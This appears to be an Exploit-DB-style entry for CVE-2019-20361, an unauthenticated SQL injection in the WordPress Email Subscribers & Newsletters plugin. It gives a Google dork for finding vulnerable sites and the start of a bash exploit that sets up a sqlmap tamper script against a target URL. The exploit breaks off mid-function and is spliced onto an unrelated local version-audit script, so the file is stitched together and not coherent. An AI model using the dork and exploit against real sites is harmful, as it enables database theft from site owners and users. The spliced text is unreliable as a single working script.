WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated)
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBAZ@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: < 4.3.3
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-20361
# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361

main () {
    header
    if [ "$#" -ne 1 ]; then
        echo "Usage : bash CVE-2019-20361.sh [BASE URL]"
        echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/"
        exit
    fi

    url=$1
    echo ' Target URL : ' "$url"
    echo ' Generating sqlmap tamper script in /tmp'
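
For administrators auditing their own installations, the following added example (not part of the original exploit or of the plugin's code) reads the "Stable tag" from the plugin's readme.txt on the local filesystem and compares it with the fixed version 4.3.3 given in the header above. The function names and the status strings are assumptions made for this example.

```sh
#!/bin/sh
# Added example: local audit for CVE-2019-20361 (Email Subscribers & Newsletters).
# FIXED_VERSION is taken from the advisory header ("Version: < 4.3.3").
FIXED_VERSION="4.3.3"

# version_lt A B -> returns 0 when dotted version A is strictly lower than B
version_lt() {
    vl_a=$1; vl_b=$2
    while [ -n "$vl_a" ] || [ -n "$vl_b" ]; do
        vl_x=${vl_a%%.*}; vl_y=${vl_b%%.*}
        # Missing components count as 0, so 4.3 is treated as 4.3.0
        [ "${vl_x:-0}" -lt "${vl_y:-0}" ] && return 0
        [ "${vl_x:-0}" -gt "${vl_y:-0}" ] && return 1
        case $vl_a in *.*) vl_a=${vl_a#*.} ;; *) vl_a= ;; esac
        case $vl_b in *.*) vl_b=${vl_b#*.} ;; *) vl_b= ;; esac
    done
    return 1
}

# stable_tag FILE -> prints the first "Stable tag:" value of a plugin readme.txt
stable_tag() {
    sed -n 's/^[[:space:]]*Stable tag:[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" | head -n 1
}

# es_plugin_status WP_ROOT -> prints vulnerable | patched | unknown | not-installed
es_plugin_status() {
    es_readme="$1/wp-content/plugins/email-subscribers/readme.txt"
    [ -r "$es_readme" ] || { echo "not-installed"; return 0; }
    es_ver=$(stable_tag "$es_readme")
    case $es_ver in
        # Empty, non-numeric (e.g. "trunk") or malformed tags cannot be compared
        ''|*[!0-9.]*|.*|*.|*..*) echo "unknown" ;;
        *)
            if version_lt "$es_ver" "$FIXED_VERSION"; then
                echo "vulnerable"
            else
                echo "patched"
            fi ;;
    esac
}

# Audit the WordPress root passed as the first argument, if one was given.
if [ "$#" -ge 1 ]; then
    es_plugin_status "$1"
fi
```

A result of "unknown" means the readme does not carry a numeric Stable tag; check the version in the plugin's main PHP file or the WordPress admin plugin list instead.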